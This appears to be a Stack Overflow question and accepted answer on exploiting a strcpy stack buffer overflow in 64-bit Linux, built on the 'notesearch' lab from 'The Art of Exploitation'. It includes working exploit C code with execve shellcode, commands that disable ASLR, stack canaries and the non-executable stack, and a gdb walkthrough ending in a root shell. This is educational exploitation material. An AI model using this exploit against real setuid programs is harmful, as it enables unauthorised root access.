# Buffer overflow in 64 bit with strcpy

Tags: c, linux, security, x86, gdb

I'm basically trying to run a buffer overflow attack. Based on what I understand we need 3 parts:

1. A nope sled
2. Shell Code to execute
3. Return address

The problem I'm having is in 64 bit linux the return address is something like 0x00007fffffffdcf2. In Strcpy if a null character is seen then it will stop copying. So basically in the end I endup with something like this:

```
0x7fffffffe233: 0x9090909090909090  0x9090909090909090
0x7fffffffe243: 0x9090909090909090  0x9090909090909090
0x7fffffffe253: 0x9090909090909090  0x9090909090909090
0x7fffffffe263: 0x9090909090909090  0x9090909090909090
0x7fffffffe273: 0xb099c931db31c031  0x6851580b6a80cda4
0x7fffffffe283: 0x69622f6868732f2f  0x8953e28951e3896e
0x7fffffffe293: 0x909090909080cde1  0x43007fffffffdcf2    <<< This line
```

If you look at the last 8 bytes instead of

```
0x00007fffffffdcf2
```

we have

```
0x43007fffffffdcf2
```

I'm assuming the 43 is just garbage data at the start. So basically is there any way to overcome this or does buffer over flow attacks not work on 64 bit systems for the strcpy function?

This is my code (based off the book the art of exploitation):

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80\x90\x90\x90\x90\x90";

int main(int argc, char *argv[]) {
    uint64_t i;
    uint64_t  ret;
    uint64_t offset=270;
    char *command, *buffer, *test;

    command = (char *) malloc(200);
    test = (char *)malloc(200);
    bzero(command, 200); // zero out the new memory

    strcpy(command, "./notesearch   \'"); // start command buffer
    buffer = command + strlen(command); // set buffer at the end

    if(argc > 1) // set offset
            offset = atoi(argv[1]);

    ret =  ((uint64_t)(&i)- offset); // set return address

    for(i=0; i < 200; i+=8) // fill buffer with return address
            memcpy((uint64_t *)((uint64_t)buffer+i), &ret, 8);
    memset(buffer, 0x90, 64); // build NOP sled
    memcpy(buffer+64, shellcode, sizeof(shellcode)-1); 

        strcat(command, "\'");


    system(command); // run exploit

}
```

Any help will be greatly appreciated.

Comment: You dont need a nop sled, if you know the exact address. And is your return address always the same (no ASLR)? In a normal linux, your adresses are more or less complete random (the offest from the start of a page maybe no), so in a other run, your address maybe do not start with zeros.

Comment: Your calculations may be off.  It's pretty unlikely that the return address would be stored at `0x7fffffffe29b`.  It should be ailgned.

Comment: @eddiem I don't know where you are getting 0x7fffffffe29b from?? The address I'm pointing out to is 0x00007fffffffdcf2 which is aligned.

Comment: @12431234123412341234123 The largest address used in the current 64 bit linux architecture is 0x0000ffffffffffff. There will always be zeros in the address.

Comment: @Pedrumj The address of the return address, not the address itself. 0x7fffffffe293 + 8 = 0x7FFFFFFFE29B.

Answer (score 1, accepted):

I was able to modify your sample code to get it to work in 64-bit with the `notesearch` program from the book.

Many of the protections in modern OSes and build tools must be turned off for this to work, but it is obviously for educational purposes, so that's reasonable for now.

First, turn off ASLR on your system with:

```
echo 0 > /proc/sys/kernel/randomize_va_space
```

This must be done as **root**, and it won't work with `sudo`, since  the `sudo` will only apply to the `echo` command, not the redirection.  Just `sudo -i` first, then run it.

Next, the `notesearch` program must be compiled with two important safety protections disabled.  By default, your program would be built with stack canaries for the detection of buffer overflows and also a non-executable stack, since there's usually no legitimate reason to run code from the stack.

```
gcc -g -z execstack -fno-stack-protector -o notesearch notesearch.c
```

Now, the exploit code:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53"
"\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main(int argc, char *argv[]) {
    char *command, *buffer;
    command = (char *) malloc(200);
    bzero(command, 200); // zero out the new memory

    strcpy(command, "./notesearch       \'"); // start command buffer
    buffer = command + strlen(command); // set buffer at the end

    memset(buffer, 'A', 0x78); // Fill buffer up to return address
    *(unsigned long long*)(buffer+0x78) = 0x7fffffffe1c0;
    memcpy(buffer, shellcode, sizeof(shellcode)-1);

    strcat(command, "\'");

    system(command); // run exploit
}
```

This problem can be narrowed down to a simple return address overwrite, so no NOP sled is required.  Additionally, the shellcode from your original post was for 32-bit only.  The 64-bit shellcode I used is from http://shell-storm.org/shellcode/files/shellcode-806.php.

The big question:  Where did `0x78` and `0x7fffffffe1c0` come from?  I started out with a number larger than 0x78 since I didn't know what to use.  I just guessed 175 since it's bigger than the target buffer.  So the first iteration had these lines:

```
memset(buffer, 'A', 175); // Overflow buffer
//*(unsigned long long*)(buffer+???) = ???;
```

Now to try that out.  Note that, while testing, I used a non-setuid version of `notesearch` to facilitate successful core dumps.

```
ulimit -c unlimited
gcc myexp.c
./a.out
```

The `notesearch` program crashed and created a core file:

```
deb82:~/notesearch$ ./a.out
[DEBUG] found a 15 byte note for user id 1000
-------[ end of note data ]-------
Segmentation fault (core dumped)
deb82:~/notesearch$
```

Running `gdb ./notesearch core` shows:

```
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00000000004008e7 in main (argc=2, argv=0x7fffffffe2c8) at notesearch.c:35
35  }
(gdb)
```

Good.  It crashed.  Why?

```
(gdb) x/1i $rip
=> 0x4008e7 <main+158>: retq   
(gdb) x/1gx $rsp
0x7fffffffe1e8: 0x4141414141414141
(gdb)
```

It's trying to return to our controlled address (all A's).  Good.  What offset from our controlled string (`searchstring`) points to the return address?

```
(gdb) p/x (unsigned long long)$rsp - (unsigned long long)searchstring
$1 = 0x78
(gdb)
```

So now we try again, with these changes:

```
memset(buffer, 'A', 0x78); // Fill buffer up to return address
*(unsigned long long*)(buffer+0x78) = 0x4242424242424242;
```

Again, we get a core dump.  Analyzing it shows:

```
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00000000004008e7 in main (argc=2, argv=0x7fffffffe318) at notesearch.c:35
35  }
(gdb) x/1i $rip
=> 0x4008e7 <main+158>: retq   
(gdb) x/1gx $rsp
0x7fffffffe238: 0x4242424242424242
(gdb)
```

Good, we controlled the return address more surgically.  Now, what do we want to put there instead of a bunch of B's?  Search a reasonable range of stack for our shellcode (`0xbb48c031` is a DWORD corresponding to the first 4 bytes in the shellcode buffer).  Just mask off the lower 3 digits and start at the beginning of the page.

```
(gdb) find /w 0x7fffffffe000,$rsp,0xbb48c031
0x7fffffffe1c0
1 pattern found.
(gdb)
```

So our shellcode exists on the stack at `0x7fffffffe1c0`.  This is our desired return address.  Updating the code with this information, and making `notesearch` setuid `root` again, we get:

```
deb82:~/notesearch$ whoami
user
deb82:~/notesearch$ ./a.out
[DEBUG] found a 15 byte note for user id 1000
-------[ end of note data ]-------
# whoami
root
#
```

The code I provided may work as is on your setup, but most likely, you'll probably need to follow a similar path to get the correct offsets to use.

Comment: Thanks for the answer. But 0x7fffffffe1c0 is not a 64 bit address. Its only 48bits (there is only 12 hex numbers in there totaling 48 bits). Gdb displays 64 bits addresses as 48bits to make them easier to read. The actual address gdb is giving you is  0x00007fffffffe1c0. If you use 0x7fffffffe1c0 and there is garbage data at that 8byte location, you will end up going some place random, and you will not endup at the nope sled as intended. If you overflow with 0x00007fffffffe1c0, it will stop after the first /00.

Comment: Also you don't need to worry about craneries. Craneries are controlled just before leaving the function. You will be redirecting program control before it reaches the check point.

Comment: That's true, but there should not be garbage at that location, because that is the location where the return address was **already** stored.

Comment: Canaries are intended to prevent this exact sort of attack.  If you tried to write an exploit for this program without using `-fno-stack-protector`, you would not be able to succeed.

Comment: @eddiem do you mean stack of the `notesearch` talking about: `So our shellcode exists on the stack at 0x7fffffffe1c0`? Shellcode in `searchstring` variable?